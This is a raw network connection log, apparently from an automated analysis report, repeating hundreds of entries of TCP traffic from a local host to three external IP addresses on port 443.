                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
